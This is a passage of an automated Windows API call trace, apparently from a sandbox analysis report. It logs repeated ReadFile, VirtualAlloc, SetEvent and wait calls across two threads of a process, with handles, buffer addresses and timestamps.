lpOverlapped=0x0) returned 1 [0206.768] SetEvent (hEvent=0x100) returned 1 [0206.768] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c900, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c900*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0206.768] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c980, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c980*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0206.768] VirtualAlloc (lpAddress=0xc00005a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005a000 [0206.769] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000c9c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c9c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0208.985] SetEvent (hEvent=0x100) returned 1 [0208.986] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000ca00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ca00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0208.986] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000ca80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ca80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0208.986] VirtualAlloc (lpAddress=0xc00005c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005c000 [0208.986] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cac0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cac0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0211.689] SetEvent (hEvent=0x100) returned 1 [0211.689] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cb00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cb00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0211.689] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cb80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cb80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0211.689] VirtualAlloc (lpAddress=0xc00005e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00005e000 [0211.689] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cbc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cbc0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0213.565] SetEvent (hEvent=0x100) returned 1 [0213.565] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cc00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cc00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0213.565] VirtualAlloc (lpAddress=0xc000060000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000060000 [0213.566] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cc80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cc80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0213.566] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000ccc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ccc0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0218.202] SetEvent (hEvent=0x100) returned 1 [0218.202] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cd00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cd00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0218.203] VirtualAlloc (lpAddress=0xc000064000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000064000 [0218.203] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cd80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cd80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0218.203] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cdc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cdc0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0220.608] SetEvent (hEvent=0x100) returned 1 [0220.608] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000ce00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ce00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0220.608] VirtualAlloc (lpAddress=0xc000066000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000066000 [0220.609] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000ce80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ce80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0220.609] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cec0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cec0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0222.310] SetEvent (hEvent=0x100) returned 1 [0222.311] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cf00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cf00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0222.311] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cf80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cf80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0222.311] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000cfc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000cfc0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0223.876] SetEvent (hEvent=0x100) returned 1 [0223.876] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d000, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d000*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0223.876] VirtualAlloc (lpAddress=0xc00006a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00006a000 [0223.876] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d080, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d080*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0223.876] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d0c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d0c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0225.376] SetEvent (hEvent=0x100) returned 1 [0225.376] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d100, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d100*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0225.376] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d180, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d180*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0225.376] VirtualAlloc (lpAddress=0xc00006c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00006c000 [0225.376] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d1c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d1c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0227.583] SetEvent (hEvent=0x100) returned 1 [0227.583] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d200, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d200*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0227.583] VirtualAlloc (lpAddress=0xc00006e000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00006e000 [0227.628] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d280, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d280*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0227.628] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d2c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d2c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0229.378] SetEvent (hEvent=0x100) returned 1 [0229.378] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d300, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d300*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0229.378] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d380, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d380*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0229.378] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d3c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d3c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0230.730] SetEvent (hEvent=0x100) returned 1 [0230.730] VirtualAlloc (lpAddress=0xc000072000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000072000 [0230.731] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d400, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d400*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0230.731] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d480, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d480*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0230.731] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d4c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d4c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0232.025] SetEvent (hEvent=0x100) returned 1 [0232.025] VirtualAlloc (lpAddress=0xc000074000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000074000 [0232.026] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d500, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d500*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0232.026] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d580, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d580*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0232.026] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d5c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d5c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0234.553] SetEvent (hEvent=0x100) returned 1 [0234.553] VirtualAlloc (lpAddress=0xc000076000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000076000 [0234.554] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d600, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d600*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0234.554] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d680, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d680*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0234.554] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d6c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d6c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0235.738] SetEvent (hEvent=0x100) returned 1 [0235.738] VirtualAlloc (lpAddress=0xc000078000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000078000 [0235.739] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d700, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d700*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0235.739] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d780, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d780*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0235.739] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d7c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d7c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0236.734] SetEvent (hEvent=0x100) returned 1 [0236.734] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d800, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d800*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0236.734] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d880, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d880*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0236.734] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d8c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d8c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0237.707] SetEvent (hEvent=0x100) returned 1 [0237.707] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d900, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d900*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0237.707] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d980, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d980*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0237.718] VirtualAlloc (lpAddress=0xc000200000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000200000 [0237.719] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000d9c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000d9c0*, lpNumberOfBytesRead=0xc00010fddc*=0x20, lpOverlapped=0x0) returned 1 [0237.996] SetEvent (hEvent=0x100) returned 1 [0237.997] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000da00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000da00*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0239.064] SetEvent (hEvent=0x100) returned 1 [0239.064] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000da80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000da80*, lpNumberOfBytesRead=0xc00010fddc*=0x37, lpOverlapped=0x0) returned 1 [0239.064] VirtualAlloc (lpAddress=0xc000204000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000204000 [0239.064] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000db00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000db00*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0239.092] SetEvent (hEvent=0x100) returned 1 [0239.092] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000db40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000db40*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0240.067] SetEvent (hEvent=0x100) returned 1 [0240.067] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000db80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000db80*, lpNumberOfBytesRead=0xc00010fddc*=0x28, lpOverlapped=0x0) returned 1 [0240.214] SetEvent (hEvent=0x100) returned 1 [0240.214] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dbc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dbc0*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0242.617] SetEvent (hEvent=0x100) returned 1 [0242.617] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dc00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dc00*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0243.617] SetEvent (hEvent=0x100) returned 1 [0243.617] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dc40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dc40*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0244.710] SetEvent (hEvent=0x100) returned 1 [0244.710] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dc80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dc80*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0245.659] SetEvent (hEvent=0x100) returned 1 [0245.659] VirtualAlloc (lpAddress=0xc00007e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00007e000 [0245.659] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dcc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dcc0*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0247.186] SetEvent (hEvent=0x100) returned 1 [0247.186] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dd00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dd00*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0248.160] SetEvent (hEvent=0x100) returned 1 [0248.160] VirtualAlloc (lpAddress=0xc00020a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00020a000 [0248.160] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dd40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dd40*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0249.111] SetEvent (hEvent=0x100) returned 1 [0249.111] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dd80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dd80*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0250.129] SetEvent (hEvent=0x100) returned 1 [0250.129] VirtualAlloc (lpAddress=0xc00020c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00020c000 [0250.130] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000ddc0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000ddc0*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0251.141] SetEvent (hEvent=0x100) returned 1 [0251.141] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000de40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000de40*, lpNumberOfBytesRead=0xc00010fddc*=0x13, lpOverlapped=0x0) returned 1 [0251.141] VirtualAlloc (lpAddress=0xc00020e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00020e000 [0251.141] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000de80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000de80*, lpNumberOfBytesRead=0xc00010fddc*=0x1f, lpOverlapped=0x0) returned 1 [0251.239] SetEvent (hEvent=0x100) returned 1 [0251.239] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000dec0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000dec0*, lpNumberOfBytesRead=0xc00010fddc*=0x40, lpOverlapped=0x0) returned 1 [0251.239] VirtualAlloc (lpAddress=0xc000210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000210000 [0251.240] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000df40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000df40*, lpNumberOfBytesRead=0xc00010fddc*=0x5, lpOverlapped=0x0) returned 1 [0251.240] ReadFile (in: hFile=0xf4, lpBuffer=0xc00000df80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000df80*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0253.168] SetEvent (hEvent=0x100) returned 1 [0253.168] VirtualAlloc (lpAddress=0xc000116000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000116000 [0253.169] ReadFile (in: hFile=0xf4, lpBuffer=0xc0000baa40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000baa40*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0254.610] SetEvent (hEvent=0x100) returned 1 [0254.610] ReadFile (in: hFile=0xf4, lpBuffer=0xc0000baa80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000baa80*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0255.741] SetEvent (hEvent=0x100) returned 1 [0255.741] VirtualAlloc (lpAddress=0xc000118000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000118000 [0255.741] ReadFile (in: hFile=0xf4, lpBuffer=0xc0000baac0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000baac0*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0256.784] SetEvent (hEvent=0x100) returned 1 [0256.785] ReadFile (in: hFile=0xf4, lpBuffer=0xc0000bab00, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000bab00*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0257.768] SetEvent (hEvent=0x100) returned 1 [0257.768] VirtualAlloc (lpAddress=0xc00011a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00011a000 [0257.768] ReadFile (in: hFile=0xf4, lpBuffer=0xc0000bab40, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000bab40*, lpNumberOfBytesRead=0xc00010fddc*=0x1c, lpOverlapped=0x0) returned 1 [0259.155] SetEvent (hEvent=0x100) returned 1 [0259.155] ReadFile (in: hFile=0xf4, lpBuffer=0xc0000bab80, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc00010fddc, lpOverlapped=0x0 | out: lpBuffer=0xc0000bab80, lpNumberOfBytesRead=0xc00010fddc*=0x0, lpOverlapped=0x0) returned 0 [0260.938] SetEvent (hEvent=0x100) returned 1 [0260.938] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xa5c [0056.989] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2788fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2788fea0*=0x88) returned 1 [0056.989] VirtualQuery (in: lpAddress=0x2788fec0, lpBuffer=0x2788fec0, dwLength=0x30 | out: lpBuffer=0x2788fec0*(BaseAddress=0x2788f000, AllocationBase=0x27690000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.989] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0056.995] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.000] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.009] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0057.034] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, 